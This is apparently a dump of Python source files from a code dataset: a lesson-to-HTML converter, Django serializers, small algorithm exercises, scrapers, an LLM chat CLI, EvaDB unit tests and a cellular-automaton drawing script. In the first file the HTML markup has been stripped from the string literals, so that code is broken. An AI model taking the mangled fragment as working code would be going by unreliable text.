pretext.replace('\\t', ' ')\n pretext = pretext.replace('<', '<')\n pretext = pretext.replace('>', '>')\n\n #fill in html\n pretext = pretext.split('\\n')\n\n html += '
' + pretext[0] + '
\\n' #adds title\n\n in_list = False #will be true if in olist --> precedes every element with
\n in_html = False #will be true if user is adding custom html --> will ignore all steps and paste users html in file\n\n for i in pretext[1:]:\n if i[:10] == '!!breaks!!':\n num = int(i[10:])\n html += ' \\n' * num\n continue\n if in_html:\n if i != '!!endhtml!!':\n html += i.replace('>', '>').replace('<', '<').replace(' ', '\\t').replace('&', '&') + '\\n'\n else:\n in_html = False\n continue\n if in_list:\n if i != '!!endulist!!' and i != '!!endolist!!':\n html += '
\\n'\n else:\n if i == '!!endulist!!':\n html += '\\n\\n'\n else:\n html += '\\n\\n'\n in_list = False\n continue\n if i == '':\n html += ' \\n'\n continue\n\n #check for list\n x = re.match(r'!![a-zA-Z]*!!', i)\n if x != None:\n found = x.group()\n\n #ordered lists\n if found.strip('!') == 'olist':\n html += '\\n\\n'\n in_list = True\n\n #unordered lists\n elif found.strip('!') == 'ulist':\n html += '\\n
\\n'\n continue\n\n #check for img url\n x = re.match(r'image\\(https?://.*\\)', i)\n if x != None:\n html += '\\n'\n continue\n\n #check for hyperlink\n x = re.match(r'a\\[.*\\]\\(https*://.*\\)', i)\n if x != None:\n full = x.group()\n inner_text = re.search(r'\\[.*\\]', full).group()[1:-1]\n url = re.search(r'\\(https*://.*\\)', full).group()[1:-1]\n html += '
\\n'\n continue\n\n #check for heading\n x = re.search(r'!!h\\d!!', i)\n if x != None and x.end() == 6:\n tier = x.group().strip('!h')\n html += '\\n' + i[6:] + '\\n\\n'\n continue\n\n\n #if nothing else worked\n html += '
' + i + '
\\n'\n\n if in_list:\n html += '
\\n'\n\n html += \"\"\n\n straw = open(f.rsplit('.', 1)[0] + '.html', 'w')\n straw.write(html)\n straw.close()\n\n print(\"Wrote to \" + f.rsplit('.', 1)[0] + \".html\")\n\n\ngo()\n","repo_name":"JoanChirinos/StuyCCC","sub_path":"Lessons/lessonMaker.py","file_name":"lessonMaker.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
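    A tiny lesson file exercising the syntax described in the record above; the expected tags follow the reconstructed go(), so treat the output as illustrative (the original markup was partly lost in extraction):

    My First Lesson
    !!h2!!Topics
    !!olist!!
    variables
    loops
    !!endolist!!
    That is all for today.

    Here go() wraps "My First Lesson" in an <h1>, emits an <h2> heading, an <ol> with two <li> items, and a closing <p> paragraph.
    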
+{"seq_id":"24791638087","text":"import base64\n\nfrom django.core.files.base import ContentFile\nfrom django.shortcuts import get_object_or_404\nfrom recipes.models import (Favorite, Follow, Ingredient, IngredientInRecipe,\n Recipe, ShoppingCart, Tag, )\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom users.models import User\n\n\nclass Base64ImageField(serializers.ImageField):\n\n def to_internal_value(self, data):\n \"\"\"Преобразование ка��тинки\"\"\"\n\n if isinstance(data, str) and data.startswith('data:image'):\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n data = ContentFile(base64.b64decode(imgstr), name='photo.' + ext)\n\n return super().to_internal_value(data)\n\n\nclass TagSerializer(ModelSerializer):\n \"\"\"Вывод тэгов.\"\"\"\n\n class Meta:\n model = Tag\n fields = ('id', 'name', 'color', 'slug')\n\n\nclass IngredientSerializer(ModelSerializer):\n \"\"\"вывод ингредиентов.\"\"\"\n\n class Meta:\n model = Ingredient\n fields = ('id', 'name', 'measurement_unit')\n\n\nclass UsersSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор выдачи информации о user.\n \"\"\"\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed'\n )\n\n def get_is_subscribed(self, obj):\n \"\"\"\n Проверка на подписку.\n \"\"\"\n user_me = self.context['request'].user\n if not user_me.is_authenticated:\n return False\n return user_me.follower.filter(author=obj).exists()\n\n\nclass IngredientInRecipeSerializer(serializers.ModelSerializer):\n id = serializers.ReadOnlyField(source='ingredient.id')\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit')\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\nclass RecipeViewSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True)\n author = UsersSerializer()\n ingredients = IngredientInRecipeSerializer(\n source='ingredient_list', many=True)\n is_favorited = serializers.SerializerMethodField()\n is_in_shopping_cart = serializers.SerializerMethodField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n def get_is_favorited(self, obj):\n \"\"\"Проверка на добавление в избранное.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return Favorite.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n def get_is_in_shopping_cart(self, obj):\n \"\"\"проверка на наличие в корзине.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return ShoppingCart.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи рецепта(ов) с общей информацией.\n \"\"\"\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'name',\n 'image',\n 'cooking_time'\n )\n\n\nclass CreateIngredientsInRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для ингредиентов в рецептах\"\"\"\n\n id = serializers.IntegerField()\n amount = serializers.IntegerField()\n\n @staticmethod\n def validate_amount(value):\n \"\"\"Валидация количества\"\"\"\n\n if value < 1:\n raise 
serializers.ValidationError(\n 'Количество ингредиента должно быть больше 0!'\n )\n return value\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'amount')\n\n\nclass CreateRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Создание рецептов\"\"\"\n\n ingredients = CreateIngredientsInRecipeSerializer(many=True)\n tags = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Tag.objects.all()\n )\n image = Base64ImageField(use_url=True)\n\n class Meta:\n model = Recipe\n fields = ('ingredients', 'tags', 'name',\n 'image', 'text', 'cooking_time')\n\n def to_representation(self, instance):\n \"\"\"Представление модели\"\"\"\n\n serializer = RecipeViewSerializer(\n instance,\n context={\n 'request': self.context.get('request')\n }\n )\n return serializer.data\n\n def validate(self, data):\n \"\"\"Валидация ингредиентов\"\"\"\n\n ingredients = self.initial_data.get('ingredients')\n lst_ingredient = []\n\n for ingredient in ingredients:\n if ingredient['id'] in lst_ingredient:\n raise serializers.ValidationError(\n 'Ингредиенты должны быть уникальными!'\n )\n lst_ingredient.append(ingredient['id'])\n return data\n\n def recipe_create_or_update(self, instance, validated_data):\n \"\"\"\n Метод для создания или обновления ингредиентов и тегов.\n \"\"\"\n ingredients, tags = (\n validated_data.pop('ingredients'), validated_data.pop('tags')\n )\n for item in ingredients:\n cur_obj, _ = IngredientInRecipe.objects.get_or_create(\n recipe=instance,\n ingredient=get_object_or_404(Ingredient, pk=item['id']),\n amount=item['amount']\n )\n for item in tags:\n instance.tags.add(item)\n\n return instance\n\n def create(self, validated_data):\n raw_data = {\n 'ingredients': validated_data.pop('ingredients'),\n 'tags': validated_data.pop('tags')\n }\n recipe = Recipe.objects.create(**validated_data)\n return self.recipe_create_or_update(recipe, raw_data)\n\n def update(self, instance, validated_data):\n instance.ingredients.clear()\n instance.tags.clear()\n instance = self.recipe_create_or_update(instance, validated_data)\n return super().update(instance, validated_data)\n\n\nclass FavoriteSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи избранных рецептов.\n \"\"\"\n\n class Meta:\n model = Favorite\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if Favorite.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в избранном'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n\n\nclass FollowSerializer(UsersSerializer):\n \"\"\"\n Сериализатор для выдачи подписок.\n \"\"\"\n recipes_count = serializers.SerializerMethodField()\n recipes = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n 'recipes',\n 'recipes_count'\n )\n\n def get_recipes(self, author):\n \"\"\"\n При наличии в параметрах запроса recipes_limit происходит\n выдача среза списка с ингредиентами.\n \"\"\"\n request = self.context.get('request')\n recipes_limit = request.query_params.get('recipes_limit')\n if recipes_limit:\n return RecipeSerializer(\n Recipe.objects.filter(author=author)[:int(recipes_limit)],\n context={'queryset': request},\n many=True\n ).data\n return RecipeSerializer(\n Recipe.objects.filter(author=author),\n context={'queryset': request},\n many=True\n ).data\n\n def get_recipes_count(self, obj):\n 
\"\"\"\n Подсчет количества рецептов автора.\n \"\"\"\n return obj.recipes.count()\n\n\nclass FollowPostSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для создание запроса на подписку.\n \"\"\"\n\n class Meta:\n model = Follow\n fields = (\n 'author',\n 'user'\n )\n\n def validate(self, data):\n user_me = self.context['request'].user\n if user_me == data['author']:\n raise serializers.ValidationError(\n 'Нельзя подписываться на самого себя!'\n )\n if Follow.objects.filter(\n author=data['author'],\n user=user_me):\n raise serializers.ValidationError(\n f'Вы подписаны на автора {data[\"author\"]}!'\n )\n return data\n\n def to_representation(self, instance):\n return FollowSerializer(\n instance.author,\n context={'request': self.context.get('request')}\n ).data\n\n\nclass ShoppingCartSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для списка покупок автора.\n \"\"\"\n\n class Meta:\n model = ShoppingCart\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if ShoppingCart.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в списке покупок'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n","repo_name":"ElenaAntonenko/foodgram-project-react","sub_path":"backend/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":10757,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"72706654194","text":"'''\nHow to reverse an integer\n\nDesign an efficient algorithm to reverse a given integer.\n\nExample:\n\ninput: 1234\noutput: 4321\n'''\n\n# Use the module operator to collect the last digit\n# Then use integer division to delete the last digit\n# build the new integer up tens-place by tens-place\ndef reverse_integer(n: int) -> int:\n reverse = 0\n remainder = 0\n \n while (n > 0):\n remainder = n % 10\n n = n // 10\n reverse = reverse * 10 + remainder\n return reverse\n\nif __name__ == '__main__':\n print(reverse_integer(12345678))","repo_name":"EandrewJones/algorithms","sub_path":"interview_questions/arrays/reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28124967662","text":"# coding=utf-8\n# Implements stream chat in command line for fine-tuned models.\n# Usage: python cli_demo.py --model_name_or_path path_to_model --checkpoint_dir path_to_checkpoint\n\n\nfrom utils import (\n Template,\n load_pretrained,\n prepare_infer_args,\n get_logits_processor\n)\nfrom threading import Thread\nfrom transformers import TextIteratorStreamer\n\n\ndef main():\n\n model_args, data_args, finetuning_args, generating_args = prepare_infer_args()\n # model_name = \"BLOOM\" if \"bloom\" in model_args.model_name_or_path else \"LLaMA\"\n model_name = \"仲景\"\n model, tokenizer = load_pretrained(model_args, finetuning_args)\n\n prompt_template = Template(data_args.prompt_template)\n streamer = TextIteratorStreamer(tokenizer, timeout=60.0, skip_prompt=True, skip_special_tokens=True)\n\n def predict_and_print(query, history: list):\n input_ids = tokenizer([prompt_template.get_prompt(query, history)], return_tensors=\"pt\")[\"input_ids\"]\n input_ids = input_ids.to(model.device)\n\n gen_kwargs = generating_args.to_dict()\n gen_kwargs[\"input_ids\"] = input_ids\n gen_kwargs[\"logits_processor\"] = get_logits_processor()\n gen_kwargs[\"streamer\"] = streamer\n\n thread = Thread(target=model.generate, kwargs=gen_kwargs)\n thread.start()\n response = \"\"\n print(\"{}: \".format(model_name), end=\"\")\n for new_text in streamer:\n print(new_text, end=\"\", flush=True)\n response += new_text\n print()\n history = history + [(query, response)]\n return history\n\n history = []\n print(\"欢迎使用 {} 模型,输入内容即可对话,clear清空对话历史,stop终止程序\".format(model_name))\n while True:\n try:\n query = input(\"\\nInput: \")\n except UnicodeDecodeError:\n print(\"Detected decoding error at the inputs, please set the terminal encoding to utf-8.\")\n continue\n except Exception:\n raise\n\n if query.strip() == \"stop\":\n break\n\n if query.strip() == \"clear\":\n history = []\n print(\"History has been removed.\")\n continue\n\n history = predict_and_print(query, history)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zlasejd/HuangDI","sub_path":"src/cli_demo.py","file_name":"cli_demo.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"39"}
+{"seq_id":"10611437673","text":"#Change user-agent to anything appropriate\n# Get links of reference webpages stored in a .json file\n#print out image links from given url\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport re\nimport requests \n\n######## TASK 5\n#modded useragent\nfakeuseragent = { 'User-Agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko)\"}\nmoduseragent = { 'user-Agent':\"Mobile\"}\n\n#set target webpage\nurl = 'http://172.18.58.238/headers.php'\n\n##\ndef Task5():\n\n #GET\n r = requests.Session()\n request = r.get(url, headers=fakeuseragent)\n statusCode = request.status_code\n #header\n header = request.headers\n\n #to change header type to mobile\n header.update(moduseragent)\n new_request = r.get(url, headers=header)\n\n\n Task5File = open(\"task5.txt\", \"w\")\n Task5File.write(f\"{request.status_code}\\n{header}\\n$$$ Modded: \\n{moduseragent}\\n{new_request.headers}\")\n\n if statusCode == 200:\n print(\"OK\")\n else:\n print(\"Error status code: %s\"%statusCode)\n print(\"\\n$$$ Modded: \\n\", moduseragent)\n print(new_request.headers)\n\nclass parseTask6(scrapy.Spider):\n\n name = 'task6'\n #test url\n start_urls = ['http://172.18.58.238/index.php']\n open(\"task6.json\", 'w').close()\n def parse(self, response):\n Task6 = open(\"task6.json\", 'a')\n for link in response.css('a'):\n link_results = link.css('a::attr(href)').get()\n Task6.write(str({'results': link_results})+\"\\n\")\n Task6.close()\n\n#image urls extractions\nclass parseImages(scrapy.Spider):\n img_list=[]\n name = 'task7'\n allowed_domains = ['172.18.58.238']\n \n start_urls = ['http://172.18.58.238/index.php']\n \n \n def parse(self, response):\n url = response.url \n for i in response.css('img::attr(src)').extract():\n if '.jpg':\n self.img_list.append(url + i)\n \n for u in response.css('img::attr(src)').extract():\n if u is not None:\n yield response.follow(u, callback=self.parse)\n\n \n\n print(img_list)\n \n \nTask5()\nprocess = CrawlerProcess()\nprocess.crawl(parseTask6)\nprocess.crawl(parseImages)\nprocess.start()","repo_name":"BAPESHOTZ/REPO-STUFFZ","sub_path":"scrapy.py","file_name":"scrapy.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"30315625650","text":"import re\nimport os\n\n\n#classified tweets according to hashtag\ndef isLeave(filename):\n\tleavePath = './labeled_tweets/leave'\n\tleaveTweets = open(leavePath, 'a')\n\tglobal leaveCnt\n\n\tremainPath = './labeled_tweets/remain'\n\tremainTweets = open(remainPath, 'a')\n\tglobal remainCnt\n\n\tsourcePath = './tweets_by_month/' + filename\n\n\twith open(sourcePath) as f:\n\t\tfor line in f:\n\t\t\tline = line.lower()\n\t\t\tline = re.sub(r'\\|\\~|\\`|\\!|\\$|\\%|\\^|\\&|\\*|\\(|\\)|\\-|\\_|\\+|\\=|\\||\\\\|\\[|\\]|\\{|\\}|\\;|\\:|\\\"|\\'|\\,|\\<|\\.|\\>|\\/|\\?', \" \", line)\n\t\t\tif re.search('#voteleave|#leave|#takecontrol|#leaveeu', line):\n\t\t\t\tleaveTweets.write(line)\n\t\t\t\tleaveCnt = leaveCnt + 1\n\t\t\tif re.search('#voteremain|#remain|#strongerin|#labourinforbritain|#intogether', line):\n\t\t\t\tremainTweets.write(line)\n\t\t\t\tremainCnt = remainCnt + 1\n\nif __name__=='__main__':\n\n\tleaveCnt = 0\n\tremainCnt = 0\n\tpath = './tweets_by_month/'\n\tfor root, dirs, files in os.walk(path):\n\t\tfor filename in files:\n\t\t\tisLeave(filename)\n\tprint(leaveCnt)\n\tprint(remainCnt)\n\n\n","repo_name":"BrexitProject/TweetsMining","sub_path":"isLeave.py","file_name":"isLeave.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"18633326936","text":"import os\nimport utils\nimport confmat\n\n\ndef quality_score(tp, tn, fp, fn):\n score = (tp + tn)/(tp + tn + 10*fp + fn)\n print(f\"found {tp} spams out of {tp+fn}, found {tn} hams out of {tn+fp}\")\n return score\n\n\ndef compute_quality_for_corpus(path):\n truth_dict = utils.read_classification_from_file(\n os.path.join(path, '!truth.txt'))\n pred_dict = utils.read_classification_from_file(\n os.path.join(path, '!prediction.txt'))\n cm = confmat.BinaryConfusionMatrix(pos_tag='SPAM', neg_tag='OK')\n cm.compute_from_dicts(truth_dict, pred_dict)\n return quality_score(**cm.as_dict())\n\n\nif __name__ == \"__main__\":\n print(compute_quality_for_corpus(os.path.join(\"data\", \"1\")))\n","repo_name":"radkop2000/SpamFilter","sub_path":"quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"24375269217","text":"'''\r\n1. Развернуть у себя на компьютере/виртуальной машине/хостинге MongoDB и реализовать функцию,\r\nзаписывающую собранные вакансии в созданную БД.\r\n'''\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport pandas as pd\r\nimport csv\r\nfrom pymongo import MongoClient\r\n\r\nheader = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}\r\n\r\n\r\ndef get_data(zp):\r\n resp = requests.get(f'https://www.rabota.ru/?sort=relevance&min_salary={zp}', headers=header)\r\n soup = bs(resp.text, 'lxml')\r\n result = []\r\n w = soup.find_all(class_=\"vacancy-preview-card__title\")\r\n p = soup.find_all(class_=\"vacancy-preview-card__salary vacancy-preview-card__salary-blue\")\r\n for i in range(20):\r\n result.append({\r\n 'Вакансия': w[i].text.strip(),\r\n 'Зарплата': p[i].text.strip().replace('\\xa0', ' ')\r\n })\r\n print(result[i])\r\n pd.DataFrame(result).to_csv('dump.csv')\r\n\r\n\r\ndef to_mongo():\r\n client = MongoClient('localhost')\r\n db = client[\"test01\"]\r\n col = db[\"work\"]\r\n with open('dump.csv', 'r', encoding='utf-8') as read_obj:\r\n csv_reader = csv.DictReader(read_obj)\r\n mylist = csv_reader\r\n col.insert_many(mylist)\r\n\r\n\r\nget_data(80000) # Требуемая зарплата\r\nto_mongo()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"softicer-67/PARSING","sub_path":"Lesson_3/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"1698504564","text":"# 1.3\n# URLify: Write a method to replace all spaces in a string with '%20'.\n# You may assume that the string has sufficient space at the end to hold the additional characters,\n# and that you are given the \"true\" length of the string.\n\n# using an additional data structure - O(n) time, O(n) space\ndef URLify(input_str, n):\n url_string = \"\"\n\n for i in range(n):\n if (input_str[i] == ' '):\n url_string += \"%20\"\n else:\n url_string += input_str[i]\n\n return url_string\n\nassert(URLify(\"Mr John Smith \", 13) == \"Mr%20John%20Smith\")\n\n# in-place - O(n) time, O(1) space\ndef URLify2(input_str, n):\n space_count = 0\n\n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n space_count += 1\n\n shift = space_count * 2\n \n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n input_str[i + shift] = '0'\n input_str[i + shift - 1] = '2'\n input_str[i + shift - 2] = '%'\n shift -= 2\n else:\n input_str[i + shift] = input_str[i]\n\n return input_str\n\n# because Python strings are immutable, a list is inputted instead of a string\nassert(URLify2(list(\"Mr John Smith \"), 13) == list(\"Mr%20John%20Smith\")) \n\nprint(\"Passed.\")","repo_name":"carterkelly9/CtCI","sub_path":"arrays-and-strings/URLify.py","file_name":"URLify.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"25055104686","text":"import sys\nt = int(input())\n\nf = [0] * 10001\nf[1] = 1\nf[2] = 1\n\nfor j in range(3, 10001):\n f[j] = f[j-1] + f[j-2]\n\nfor i in range(t):\n p, q = map(int, sys.stdin.readline().split())\n print(f\"Case #{i+1}: {f[p]%q}\")\n","repo_name":"oRE-o/Problem-Solving","sub_path":"9711_피보나치.py","file_name":"9711_피보나치.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
+{"seq_id":"6888404888","text":"import unittest\nfrom test.unit_tests.executor.utils import DummyExecutor\n\nimport numpy as np\nimport pandas as pd\nfrom mock import MagicMock\n\nfrom evadb.executor.limit_executor import LimitExecutor\nfrom evadb.executor.orderby_executor import OrderByExecutor\nfrom evadb.expression.constant_value_expression import ConstantValueExpression\nfrom evadb.expression.tuple_value_expression import TupleValueExpression\nfrom evadb.models.storage.batch import Batch\nfrom evadb.parser.types import ParserOrderBySortType\nfrom evadb.plan_nodes.limit_plan import LimitPlan\nfrom evadb.plan_nodes.orderby_plan import OrderByPlan\n\n\nclass LimitExecutorTest(unittest.TestCase):\n def test_should_return_smaller_num_rows(self):\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n limit_value = 125\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n total_size = 0\n for batch in reduced_batches:\n total_size += len(batch)\n\n self.assertEqual(total_size, limit_value)\n\n def test_should_return_limit_greater_than_size(self):\n \"\"\"This should return the exact same data\n if the limit value is greater than what is present.\n This will also leave a warning\"\"\"\n\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n previous_total_size = 0\n for batch in batches:\n previous_total_size += len(batch)\n\n limit_value = 500\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n after_total_size = 0\n for batch in reduced_batches:\n after_total_size += len(batch)\n\n self.assertEqual(previous_total_size, after_total_size)\n\n def test_should_return_top_frames_after_sorting(self):\n \"\"\"\n Checks if limit returns the top 2 rows from the data\n after sorting\n\n data (3 batches):\n 'A' 'B' 'C'\n [1, 1, 1]\n ----------\n [1, 5, 6]\n [4, 7, 10]\n ----------\n [2, 9, 7]\n [4, 1, 2]\n [4, 2, 4]\n \"\"\"\n\n df1 = pd.DataFrame(np.array([[1, 1, 1]]), columns=[\"A\", \"B\", \"C\"])\n df2 = pd.DataFrame(np.array([[1, 5, 6], [4, 7, 10]]), columns=[\"A\", \"B\", \"C\"])\n df3 = pd.DataFrame(\n np.array([[2, 9, 7], [4, 1, 2], [4, 2, 4]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n batches = [Batch(frames=df) for df in [df1, df2, df3]]\n\n \"query: .... 
ORDER BY A ASC, B DESC limit 2\"\n\n plan = OrderByPlan(\n [\n (TupleValueExpression(col_alias=\"A\"), ParserOrderBySortType.ASC),\n (TupleValueExpression(col_alias=\"B\"), ParserOrderBySortType.DESC),\n ]\n )\n\n orderby_executor = OrderByExecutor(MagicMock(), plan)\n orderby_executor.append_child(DummyExecutor(batches))\n\n sorted_batches = list(orderby_executor.exec())\n\n limit_value = 2\n plan = LimitPlan(ConstantValueExpression(limit_value))\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(sorted_batches))\n reduced_batches = list(limit_executor.exec())\n\n # merge everything into one batch\n aggregated_batch = Batch.concat(reduced_batches, copy=False)\n \"\"\"\n A B C\n 0 1 5 6\n 1 1 1 1\n \"\"\"\n\n expected_df1 = pd.DataFrame(\n np.array([[1, 5, 6], [1, 1, 1]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n expected_batches = [Batch(frames=df) for df in [expected_df1]]\n\n self.assertEqual(expected_batches[0], aggregated_batch)\n","repo_name":"georgia-tech-db/evadb","sub_path":"test/unit_tests/executor/test_limit_executor.py","file_name":"test_limit_executor.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":2438,"dataset":"github-code","pt":"39"}
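The behaviour these tests pin down — emit whole batches until the budget forces one final partial slice — is independent of EvaDB's Batch class; a library-agnostic sketch of the same idea on plain lists:

def limit_batches(batches, limit):
    remaining = limit
    for batch in batches:
        if remaining <= 0:
            return
        yield batch[:remaining] if len(batch) > remaining else batch
        remaining -= min(len(batch), remaining)

assert list(limit_batches([[1, 2, 3], [4, 5], [6]], 4)) == [[1, 2, 3], [4]]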
+{"seq_id":"21346829393","text":"import turtle\r\nimport random\r\nimport time\r\n\r\ndef rotl(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef rotr(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = -y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef dec2bin(i):\r\n str=\"{0:b}\".format(i)\r\n while len(str)<8:\r\n str='0'+str\r\n num=[0]*8\r\n for i in range(8):\r\n if str[i]=='0':\r\n num[i]=0\r\n else:\r\n num[i]=1\r\n return num\r\n\r\ndef vecadd(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]+b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]+b[i]\r\n return res\r\n\r\ndef xshapes(aTurtle,B,size,sym):\r\n angle=360/sym\r\n aTurtle.goto(0,0)\r\n for j in range(sym):\r\n aTurtle.up()\r\n aTurtle.forward(size)\r\n aTurtle.down()\r\n X=aTurtle.xcor()\r\n Y=aTurtle.ycor()\r\n for k in range(len(B)):\r\n if B[k-1]==1:\r\n aTurtle.left(angle)\r\n else:\r\n aTurtle.right(angle)\r\n aTurtle.forward(size)\r\n aTurtle.pencolor(\"lightgray\")\r\n aTurtle.goto(X,Y)\r\n aTurtle.pencolor(\"black\")\r\n\r\ndef vecsub(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]-b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]-b[i]\r\n return res\r\n\r\ndef vecmul(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]*b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]*b[i]\r\n return res\r\n\r\ndef CAstep(x,rule):\r\n r=dec2bin(rule)\r\n a=vecsub([8],vecadd(rotl(x),vecmul([2],vecadd(x,vecmul([2],rotr(x))))))\r\n n=len(x)\r\n res=[0]*n\r\n for i in range(n): \r\n res[i]=(r[a[i]-1])\r\n return res\r\n\r\ndef rules(n):\r\n bestrules=[18,22,26,28,30,45,50,54,57,58,60,62,70,73,75,78,82,86,89,90,92,94,99,101,102,105,109,110,114,118,122,124,126,129,131,133,\r\n 135,137,141,145,146,147,149,150,153,154,156,157,158,161,163,165,167,169,177,178,179,181,182,186,188,190,193,195,197,\r\n 198,199,210,214,218,225,230,242,246,250]\r\n return bestrules[n]\r\n\r\ndef main():\r\n S=input(\"symmetry \") # Order of symmetry (>3)\r\n symmetry=int(S)\r\n R=input(\"rule \") # Cellular automaton rule(0-255)\r\n rule=rules(int(R)) \r\n G=input(\"generations \") # Number of cellular automaton generations (>0)\r\n generations=int(G)+1 \r\n L=input(\"contour length \") # Length of contour bit string\r\n length=int(L)\r\n Z=input(\"segment size \") # Length of line segments in pixels\r\n size=int(Z) \r\n#\r\n B=[0]*length # \"Standard\" initial conditions\r\n 